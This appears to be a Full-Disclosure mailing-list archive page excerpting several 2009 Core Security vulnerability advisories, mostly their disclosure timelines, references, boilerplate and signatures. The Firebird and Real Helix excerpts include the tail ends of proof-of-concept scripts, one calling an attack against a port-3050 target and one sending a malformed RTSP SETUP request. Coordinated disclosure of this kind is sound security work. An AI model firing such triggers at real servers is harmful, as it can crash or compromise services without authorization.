Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2009 Core Security Technologies and (c) 2009 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.12 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAkqcRQMACgkQyNibggitWa10dACdFj5uU4P3FwXEzNLqSmfaATR9 M9AAnjRF5IQ75E5x6iQDIp5FU5CjkSXe =loI2 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2009-0727: Libpurple msn_slplink_process_msg() Arbitrary Write Vulnerability
for this distribution and proper credit is given. 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.8 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iEYEARECAAYFAkqLIpwACgkQyNibggitWa2yqgCeJ3qxJluj3aNZzz3Y6XPULeHa KG8AnRiJXqQ/XX2E0UKb1sQOeWGfJhIc =GQCO -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2009-0707: Firebird SQL op_connect_request main listener shutdown vulnerability
. port = 3050 host = '192.168.131.128'#Replace with your target host attack(host, port) - ---/ 9. *Report Timeline* . 2009-07-15: Core Security Technologies notifies the Firebird team of the vulnerability. . 2009-07-16: Firebird team requests technical details in plaintext. . 2009-07-16: Core sends the advisory draft, including technical details. . 2009-07-20: Firebird team notifies that the issue is resolved in all branches of the Firebird repository [2]. Technical details will be publicly visible when Core releases its advisory. Firebird team notices that Firebird version 1.5.5 (marked as non vulnerable in the advisory draft) seems to be affected. . 2009-07-27: Core sends the final version of the advisory to the Firebird team. . 2009-07-28: The advisory CORE-2009-0707 is published. 10. *References* [1] http://www.firebirdsql.org [2] http://tracker.firebirdsql.org/browse/CORE-2563 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs. 12. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2009 Core Security Technologies and (c) 2009 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.8 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iEYEARECAAYFAkpvTl0ACgkQyNibggitWa17uQCeMYg7kPSMqmAB1vDNn7Q7xzel 0BYAoJLL6358DsIP9wuSZDxTH3DiUp7Z =GgTL -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2009-0227: Real Helix DNA RTSP and SETUP request handler vulnerabilities
(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('172.16.132.133',554))
setRequest = SETUP / RTSP/1.0\r\n\r\n
s.send(setRequest)
s.close()
- ---/
9. *Report Timeline*
. 2009-03-04:
Core Security Technologies notifies RealNetworks of the vulnerability.
Core initially schedules publication of its advisory to April 6th, 2009.
. 2009-03-16:
Core notifies again RealNetworks of the vulnerability.
. 2009-03-16:
RealNetworks identifies the vulnerability alert as SPAM.
. 2009-03-20:
The RealNetworks team asks Core for a technical description of the
vulnerability.
. 2009-03-23:
Technical details sent to RealNetworks team by Core. RealNetworks
acknowledges reception.
. 2009-03-30:
Core requests information about the plans of RealNetworks to fix the
vulnerabilities.
. 2009-03-30:
RealNetworks responds that fixes will be included in the next public
release - currently targeted for July 2009.
. 2009-05-04:
Core requests RealNetworks a technical analysis of the vulnerabilities,
a list of the affected versions of Helix Server, and a detailed timeline
for developing, testing and releasing fixes for these vulnerabilities.
It is only based on that information that Core can reevaluate its
advisory publication timeframe (which was originally scheduled to be
published on April 6).
. 2009-05-05:
RealNetworks responds that fixes will be available in mid-2009, most
likely in the July time frame, and that to protect its customer base
RealNetworks will not provide additional details until the release is
publicly available.
. 2009-05-05:
Core requests a more precise estimation for the release of fixes (no
reply received).
. 2009-05-29:
Core requests again RealNetworks an estimated date for the release of
fixes, and technical details about the issues. In the meantime, the
publication of advisory CORE-2009-0227 is rescheduled for July 15th (no
reply received).
. 2009-07-16:
An updated version of the advisory was sent to RealNetworks by Core.
Core requests again information about this issue.
. 2009-07-17:
Core is made aware that Real Networks has released the Security Update
071409HS [2] on July 14th, which states that version 13.0.0 of the Helix
Server and the Helix Mobile Server have been updated to ensure that the
above vulnerabilities have been resolved.
. 2009-07-17:
The advisory CORE-2009-0227 is published by Core.
10. *References*
[1] RealNetworks
http://www.realnetworks.com/
[2] RealNetworks Security Update 071409HS
http://docs.real.com/docs/security/SecurityUpdate071409HS.pdf
11. *About CoreLabs*
CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://www.coresecurity.com/corelabs.
12. *About Core Security Technologies*
Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and software
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
Security Technologies can be reached at 617-399-6980 or on the Web at
http://www.coresecurity.com.
13. *Disclaimer*
The contents of this advisory are copyright (c) 2009 Core Security
Technologies and (c) 2009 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.
14. *PGP/GPG Keys*
This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.8 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
iEYEARECAAYFAkpg7eMACgkQyNibggitWa38bgCeNFBQ02cGJvhhtc8eYMaEa9VH
UHMAn3Ngc4GBXkyfSe+hkgJWYtQ13Vjh
=9iPO
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http
[Full-disclosure] CORE-2009-0519 - Awingsoft Awakening Winds3D Viewer remote command execution vulnerability
vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs. 11. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. 12. *Disclaimer* The contents of this advisory are copyright (c) 2009 Core Security Technologies and (c) 2009 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 13. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.8 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iEYEARECAAYFAkpVCKUACgkQyNibggitWa0tLACfTRppFDPNm6DnwqzSGNflLXHO RGkAnic/M9juNT6l18s2Rgb92SJSMqia =MoU+ -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2009-01515 - WordPress Privileges Unchecked in admin.php and Multiple Information
Download Counter http://wordpress.org/download/counter/ [10] WordPress Intrusion Detection System Plugin http://php-ids.org/2008/02/21/wpids-version-012-released/ [11] Hardening WordPress with htaccess http://blogsecurity.net/wordpress/article-210607 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs. 12. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2009 Core Security Technologies and (c) 2009 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.6 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFKVR7gyNibggitWa0RAin3AKCOrLLQ8XZnrCLot5d9xoZW6sdWwwCfTJ4N TPRpR0Gn0WqmF8HOeDslbA8= =zEDK -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2009-0521 - DX Studio Player Firefox plug-in command injection
formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs. 12. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2009 Core Security Technologies and (c) 2009 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.7 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFKLtHJyNibggitWa0RAlq1AJ0cZPpDqReJWHd0toN7tnTFLVA99gCgiG/Q PMPteYbShbRU4j4tIk93HPM= =Mx5G -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2008-0826 - Internet Explorer Security Zone restrictions bypass
] http://msdn2.microsoft.com/en-us/library/ms537183.aspx. [3] http://blogs.technet.com/srd/archive/2009/06/09/cve-2009-1140-benefits-of-ie-protected-mode-additional-network-protocol-lockdown-workaround.aspx [4] http://msdn.microsoft.com/en-us/library/ms775147(VS.85).aspx [5] http://msdn.microsoft.com/en-us/library/ms775107(VS.85).aspx [6] http://www.microsoft.com/technet/security/bulletin/ms08-dec.mspx. [7] Internet Explorer 8.0 was officially released at this time leaving the 'beta stage'. http://www.microsoft.com/windows/internet-explorer/default.aspx. [8] http://www.coresecurity.com/content/internet-explorer-zone-elevation [9] Compatibility View KB968220 - http://www.microsoft.com/downloads/details.aspx?displaylang=enFamilyID=008753cc-2882-400c-a45d-587c870b8c0d and http://support.microsoft.com/?kbid=968220. [10] SPAD link - http://support.microsoft.com/kb/969058. 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs. 12. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2009 Core Security Technologies and (c) 2009 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.7 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFKLtOEyNibggitWa0RAvvyAKCI46nwvU9vnduhVXILQxTdjDvS5QCfeT4Z VVaWDRlQgd4vAFGQO+I4HW0= =KI4M -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2009-0420 - Apple CUPS IPP_TAG_UNSUPPORTED Handling null pointer Vulnerability
according to the comments made by Debian Team. . 2009-05-28: Core notifies that the advisory is going to be released on June 2nd, and requests a confirmation from Apple Security Team and vendor-sec subscribers. . 2009-05-29: Apple Security Team, Red Hat Security Response Team and Debian Team confirm the proposed release date. There was no request for embargo date shift posted to vendor-sec. . 2009-06-02: The advisory CORE-2009-0420 is published. 10. *References* [1] http://www.cups.org. [2] Vendor-sec, a mailing list dedicated to distributors of operating systems using (but not necessarily solely comprised of) free and open-source software. http://oss-security.openwall.org/wiki/mailing-lists/vendor-sec. 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs. 12. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2009 Core Security Technologies and (c) 2009 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.7 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFKJY7HyNibggitWa0RAtcuAJ9vxQ4OjXhyOepyzgUg8WvG8rCMlACgsUTK A3cfFRppX8VCa6hzPcVEOiw= =G46K -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2009-0109 - Multiple XSS in Sun Communications Express
as soon as possible. . 2009-05-08: Sun engineering team informs they are still experiencing some delays with the final stages of this release process and asks to delay the publication of the advisory. . 2009-05-18: Sun engineering team confirms that they have resolved the outstanding issues related to this vulnerability and they expect to be ready to publish the fixes on Wednesday 20th May. . 2009-05-18: Core re-schedules the advisory publication date to 20th May. . 2009-05-20: The advisory CORE-2009-0109 is published. 10. *References* [1] http://www.sun.com/software/products/calendar_srvr/comms_express/index.xml [2] HTML Code Injection and Cross-Site Scripting http://www.technicalinfo.net/papers/CSS.html. [3] The Cross-Site Scripting FAQ (XSS) http://www.cgisecurity.com/articles/xss-faq.shtml [4] How to prevent Cross-Site Scripting Security Issues http://support.microsoft.com/default.aspx?scid=KB;en-us;q252985 [5] How to review ASP Code for CSSI Vulnerability http://support.microsoft.com/default.aspx?scid=kb;EN-US;253119 [6] How to review Visual InterDev Generated Code for CSSI Vulnerability http://support.microsoft.com/default.aspx?scid=kb;EN-US;253120 [7] HTTP Response Splitting vulnerability in Sun Delegated Administrator - - http://www.coresecurity.com/content/sun-delegated-administrator 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs. 12. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2009 Core Security Technologies and (c) 2009 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.7 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFKFEWVyNibggitWa0RAqSuAKCRr0zxGIvhYRVD92VLI7W1pJezQwCfVvSO SNbJmS6GjYkZPyIfI3+JIpw= =wOZe -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [Advisories] CORE-2009-0114 - HTTP Response Splitting vulnerability in Sun Delegated Administrator
Sergio 'shadown' Alvarez wrote: Hi, In the last CORE's advisories I've seen the following credits: 7. *Credits* This vulnerability was discovered by the SCS team [3] from Core Security Technologies. Does this SCS team's guy have a name ? Even in a football match 'the team' wins the match, but the GOALS are made by somebody that deserves the credits. Yes, they have names and they did not want them to appear in the advisory. Thank you for your continued interest in crediting vulnerability discoverers for their findings and your insightful comments about sports. -ivan ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2009-0114 - HTTP Response Splitting vulnerability in Sun Delegated Administrator
/whitepaper_httpresponse.pdf. [2] http://www.webappsec.org/projects/threat/classes/http_response_splitting.shtml. [3] Core Security Consulting Services - http://www.coresecurity.com/content/services-overview-core-security-consulting-services. [4] Multiple vulnerabilities in Sun Calendar Express Web Server - http://www.coresecurity.com/content/sun-calendar-express. 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs. 12. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2009 Core Security Technologies and (c) 2009 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.7 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFJ7hRxyNibggitWa0RAol4AKCOjfL+KHTrwpUC6oW8QCtpj15b5QCgrajW Naq8DYWEmQtTtrsAx/DeO1U= =3bt/ -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2009-0108: Multiple vulnerabilities in Sun Calendar Express Web Server
] HTML Code Injection and Cross-Site Scripting http://www.technicalinfo.net/papers/CSS.html. [3] The Cross-Site Scripting FAQ (XSS) http://www.cgisecurity.com/articles/xss-faq.shtml [4] How to prevent Cross-Site Scripting Security Issues http://support.microsoft.com/default.aspx?scid=KB;en-us;q252985 [5] How to review ASP Code for CSSI Vulnerability http://support.microsoft.com/default.aspx?scid=kb;EN-US;253119 [6] How to review Visual InterDev Generated Code for CSSI Vulnerability http://support.microsoft.com/default.aspx?scid=kb;EN-US;253120 10. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs. 11. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. 12. *Disclaimer* The contents of this advisory are copyright (c) 2009 Core Security Technologies and (c) 2009 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 13. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.8 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iEYEARECAAYFAknSdqcACgkQyNibggitWa0uJACdGnW7RfFSY8hVoOPaG8mQcF4b r4IAn15Z4MCrAj2uO9XKLYXBUuYHWNTv =xGtf -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2009-0122: HP OpenView Buffer Overflows
confirms March 23 as the new publication date. . 2009-03-23: Vendor publishes the hot fix. . 2009-03-23: Core publishes advisory CORE-2009-0122. 9. *References* [1] Secunia Research 07/01/2009 http://secunia.com/secunia_research/2008-13/ [2] HP OpenView Network Node Manager Toolbar.exe CGI buffer overflow http://www.saintcorporation.com/cgi-bin/exploit_info/openview_nnm_toolbar [3] CVE-2008-0067 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0067 [4] HP advisory (HPSBMA02400 SSRT080144) https://www13.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c01646081 [5] HP security bulletin http://h2.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01696729 10. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs. 11. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. 12. *Disclaimer* The contents of this advisory are copyright (c) 2009 Core Security Technologies and (c) 2009 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 13. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.8 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iEYEARECAAYFAknHys0ACgkQyNibggitWa1uoACfWfSGTJjQCfGhYOxwBVbUTAEo SuAAnAqFoSVhM7q6IcRdqyw6e8LgSFzM =DVLu -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Foxit Reader Multiple Vulnerabilities (CORE-2009-0218)
* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs. 12. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2009 Core Security Technologies and (c) 2009 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 